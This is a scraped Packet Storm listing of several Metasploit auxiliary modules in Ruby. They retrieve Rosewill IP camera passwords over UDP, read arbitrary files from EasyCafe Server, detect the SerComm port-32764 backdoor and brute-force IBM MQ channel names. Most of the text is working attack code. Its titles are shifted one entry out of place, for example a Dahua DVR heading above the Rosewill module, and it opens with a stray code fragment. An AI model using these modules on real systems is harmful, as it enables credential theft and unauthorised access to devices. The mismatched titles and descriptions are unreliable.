 def report_email_cred(mailserver, mailport, muser, mpass)    service_data = {      address: mailserver,      port: mailport,      service_name: 'email settings',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      module_fullname: fullname,      origin_type: :service,      private_data: mpass,      private_type: :password,      username: muser    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED    }.merge(service_data)    create_credential_login(login_data)  endend

Dahua DVR Authentication Bypass Scanner

This Metasploit module takes advantage of a protocol design issue with the Rosewill admin executable in order to retrieve passwords, allowing remote attackers to take administrative control over the device. Other similar IP Cameras such as Edimax, Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested. The protocol design issue also allows attackers to reset passwords on the device.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Udp  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Rosewill RXS-3211 IP Camera Password Retriever',      'Description' => %q{          This module takes advantage of a protocol design issue with the Rosewill admin        executable in order to retrieve passwords, allowing remote attackers to take        administrative control over the device.  Other similar IP Cameras such as Edimax,        Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.        The protocol design issue also allows attackers to reset passwords on the device.      },      'Author'      => 'Ben Schmidt',      'License'     => MSF_LICENSE    )    register_options(      [        Opt::CHOST,        Opt::RPORT(13364),      ])  end  def run_host(ip)    #Protocol    target_mac = "\xff\xff\xff\xff\xff\xff"    cmd  = "\x00"          #Request    cmd << "\x06\xff\xf9"  #Type    password = nil    begin      udp_sock = Rex::Socket::Udp.create( {        'LocalHost' => datastore['CHOST'] || nil,        'PeerHost'  => ip,        'PeerPort'  => datastore['RPORT'],        'Context'   =>        {          'Msf' => framework,          'MsfExploit' => self        }      })      udp_sock.put(target_mac+cmd)      res = udp_sock.recvfrom(65535, 0.5) and res[1]      #Parse the reply if we get a response      if res        password = parse_reply(res)      end    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError      print_error("Connection error")    rescue ::Interrupt      raise $!    rescue ::Exception => e      print_error("Unknown error: #{e.class} #{e}")    ensure      udp_sock.close if udp_sock    end    #Store the password if the parser returns something    if password      print_good("Password retrieved: #{password.to_s}")      report_cred(        ip: rhost,        port: rport,        service_name: 'ipcam',        user: '',        password: password,        proof: password      )    end  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def parse_reply(pkt)    @results ||= {}    # Ignore "empty" packets    return nil if not pkt[1]    if(pkt[1] =~ /^::ffff:/)      pkt[1] = pkt[1].sub(/^::ffff:/, '')    end    return pkt[0][333,12] if pkt[0][6,4] == "\x01\x06\xff\xf9"  endend

Rosewill RXS-3211 IP Camera Password Retriever

This Metasploit module exploits a file retrieval vulnerability in EasyCafe Server. The vulnerability can be triggered by sending a specially crafted packet (opcode 0x43) to the 831/TCP port. This Metasploit module has been successfully tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1. Note that the server will throw a popup messagebox if the specified file does not exist.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'        => 'EasyCafe Server Remote File Access',      'Description' => %q{          This module exploits a file retrieval vulnerability in        EasyCafe Server. The vulnerability can be triggered by        sending a specially crafted packet (opcode 0x43) to the        831/TCP port.        This module has been successfully tested on EasyCafe Server        version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3        and Windows 7 SP1.        Note that the server will throw a popup messagebox if the        specified file does not exist.      },      'License'     => MSF_LICENSE,      'Author'      =>        [          'R-73eN', # Vulnerability Discovery          'bcoles' # Metasploit module        ],      'References'  =>        [          [ 'EDB', '39102' ]        ]    ))    register_options(      [        Opt::RPORT(831),        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])      ])  end  def get_file    res = sock.get_once    unless res      print_error("Unable to retrieve file due to a timeout.")      return    end    unless res.length == 261      print_error("Received a response of an invalid size.")      return    end    file_size = res.unpack('@256V')[0]    contents = ''    while contents.length < file_size      contents << sock.get_once    end    print_good("File retrieved successfully (#{contents.length} bytes)!")    contents  end  def run_host(ip)    file_path = datastore['FILEPATH']    if file_path.length > 67      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")      return    end    packet = "\x43"    packet << file_path    packet << "\x00" * (255 - file_path.length)    packet << "\x01\x00\x00\x00\x01"    vprint_status("Sending request (#{packet.length} bytes)")    connect    sock.put(packet)    contents = get_file    disconnect    return if contents.nil?    path = store_loot(      'easycafe_server',      'application/octet-stream',      ip,      contents,      File.basename(file_path)    )    print_status("File saved in: #{path}")  endend

EasyCafe Server Remote File Access

This Metasploit module can identify SerComm manufactured network devices which contain a backdoor, allowing command injection or account disclosure.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info={})    super(update_info(info,      'Name'        => 'SerComm Network Device Backdoor Detection',      'Description' => %q{        This module can identify SerComm manufactured network devices which        contain a backdoor, allowing command injection or account disclosure.      },      'Author'         =>        [          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module        ],        'License'     => MSF_LICENSE,        'References'     =>        [          [ 'CVE', '2014-0659' ],          [ 'OSVDB', '101653' ],          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]        ],        'DisclosureDate' => '2013-12-31' ))    register_options([        Opt::RPORT(32764)      ])  end  def do_report(ip, endianness)    report_vuln({      :host => ip,      :port => rport,      :name => "SerComm Network Device Backdoor",      :refs => self.references,      :info => "SerComm Network Device Backdoor found on a #{endianness} device"    })  end  def run_host(ip)    begin      connect      sock.put(Rex::Text.rand_text(5))      res = sock.get_once      disconnect      if (res && res.start_with?("MMcS"))        print_good("#{ip}:#{rport} - Possible backdoor detected - Big Endian")        do_report(ip, "Big Endian")      elsif (res && res.start_with?("ScMM"))        print_good("#{ip}:#{rport} - Possible backdoor detected - Little Endian")        do_report(ip, "Little Endian")      else        vprint_status("#{ip}:#{rport} - Backdoor not detected.")      end    rescue Rex::ConnectionError => e      vprint_error("#{ip}:#{rport} - Connection failed: #{e.class}: #{e}")    end  endend

SerComm Network Device Backdoor Detection

This Metasploit module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'IBM WebSphere MQ Channel Name Bruteforce',      'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',      'Author'      => 'Petros Koutroumpis',      'License'     => MSF_LICENSE    )    register_options([      Opt::RPORT(1414),      OptInt.new('TIMEOUT', [true, "The socket connect timeout in seconds", 10]),      OptInt.new('CONCURRENCY', [true, "The number of concurrent channel names to check", 10]),      OptPath.new('CHANNELS_FILE',        [ true, "The file that contains a list of channel names"]      )])  end  def create_packet(chan)    packet = "\x54\x53\x48\x20"+   # StructID    "\x00\x00\x01\x0c"+     # MQSegmLen    "\x02" +         # Byte Order    "\x01" +         # SegmType    "\x01" +        # CtlFlag1    "\x00" +        # CtlFlag2    "\x00\x00\x00\x00\x00\x00\x00\x00"+  # LUWIdent    "\x22\x02\x00\x00"+      # Encoding    "\xb5\x01" +      # CCSID    "\x00\x00" +      # Reserved    "\x49\x44\x20\x20" +    # StructID    "\x0d" +        # FAP Level    "\x26" +        # CapFlag1 - Channel Type    "\x00" +        # ECapFlag1    "\x00" +        # IniErrFlg1    "\x00\x00" +      # Reserved    "\x32\x00" +      # MaxMsgBtch    "\xec\x7f\x00\x00" +    # MaxTrSize    "\x00\x00\x40\x00" +    # MaxMsgSize    "\xff\xc9\x9a\x3b" +    # SegWrapVal    + chan +         # Channel name    "\x20" +        # CapFlag2    "\x20" +        # ECapFlag2    "\x20\x20" +      # ccsid    "QM1" + "\x20"*45 +      # Queue Manager Name    "\x20\x20\x20\x20" +    # HBInterval    "\x20\x20" +      # EFLLength    "\x20" +        # IniErrFlg2    "\x20" +        # Reserved1    "\x20\x20" +      # HdrCprLst    "\x20\x20\x20\x20\x2c\x01\x00\x00"+ # MSGCprLst1    "\x8a\x00\x00\x55\x00\xff\x00\xff"+ # MsgCprLst2    "\xff\xff" +      # Reserved2    "\xff\xff\xff\xff" +    # SSLKeyRst    "\xff\xff\xff\xff" +    # ConvBySKt    "\xff" +        # CapFlag3    "\xff" +        # ECapFlag3    "\xff\xff" +      # Reserved3    "\x00\x00\x00\x00" +    # ProcessId    "\x00\x00\x00\x00" +    # ThreadId    "\x00\x00\x05\x00" +    # TraceId    "\x00\x00\x10\x13\x00\x00" +   # ProdId    "\x01\x00\x00\x00\x01\x00" +   # ProdId    "MQMID" + "\x20"*43 +    # MQM Id    "\x20\x20\x20\x20\x20\x20\x20\x20"+ # Unknown    "\x20\x20\x20\x20\x20\x20\x00\x00"+ # Unknown    "\xff\xff\xff\xff\xff\xff\xff\xff"+ # Unknown    "\xff\xff\xff\xff\xff\xff\xff\xff"+ # Unknown    "\xff\xff\x00\x00\x00\x00\x00\x00"+ # Unknown    "\x00\x00\x00\x00\x00\x00"    # Unknown  end  def run_host(ip)    @channels = []    @unencrypted_mqi_channels = []    begin      channel_list      rescue ::Rex::ConnectionRefused        fail_with(Failure::Unreachable, "TCP Port closed.")      rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET        fail_with(Failure::Unreachable, "Connection Failed.")      rescue ::Exception => e        fail_with(Failure::Unknown, e)      end      if(@channels.empty?)        print_status("#{ip}:#{rport} No channels found.")      else        print_good("Channels found: #{@channels}")        print_good("Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}")        report_note(          :host => rhost,          :port => rport,          :type => 'mq.channels'        )      print_line    end  end  def channel_list    channel_data = get_channel_names    while (channel_data.length > 0)      t = []      r = []      begin        1.upto(datastore['CONCURRENCY']) do          this_channel = channel_data.shift          if this_channel.nil?            next          end          t << framework.threads.spawn("Module(#{self.refname})-#{rhost}:#{rport}", false, this_channel) do |channel|            connect            vprint_status "#{rhost}:#{rport} - Sending request for #{channel}..."            if channel.length.to_i > 20              print_error("Channel names cannot exceed 20 characters.  Skipping.")              next            end            chan = channel + "\x20"*(20-channel.length.to_i)            timeout = datastore['TIMEOUT'].to_i            s = connect(false,              {                'RPORT' => rport,                'RHOST' => rhost,              }            )            s.put(create_packet(chan))            data = s.get_once(-1,timeout)            if data.nil?              print_status("No response received. Try increasing timeout.")              next            end            if not data[0...3].include? 'TSH'              next            end            if data[-4..-1] == "\x01\x00\x00\x00" # NO_CHANNEL code              next            end            if data[-4..-1] == "\x18\x00\x00\x00" # CIPHER_SPEC code              print_status("Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A")            elsif data[-4..-1] == "\x02\x00\x00\x00" # CHANNEL_WRONG_TYPE code              print_status("Found channel: #{channel}, IsEncrypted: False, IsMQI: False")            else              print_status("Found channel: #{channel}, IsEncrypted: False, IsMQI: True")              @unencrypted_mqi_channels << channel            end            @channels << channel            disconnect          end        end        t.each {|x| x.join }      end    end  end  def get_channel_names    if(! @common)      File.open(datastore['CHANNELS_FILE'], "rb") do |fd|        data = fd.read(fd.stat.size)        @common = data.split(/\n/).compact.uniq      end    end    @common  endend

Source

Packet Storm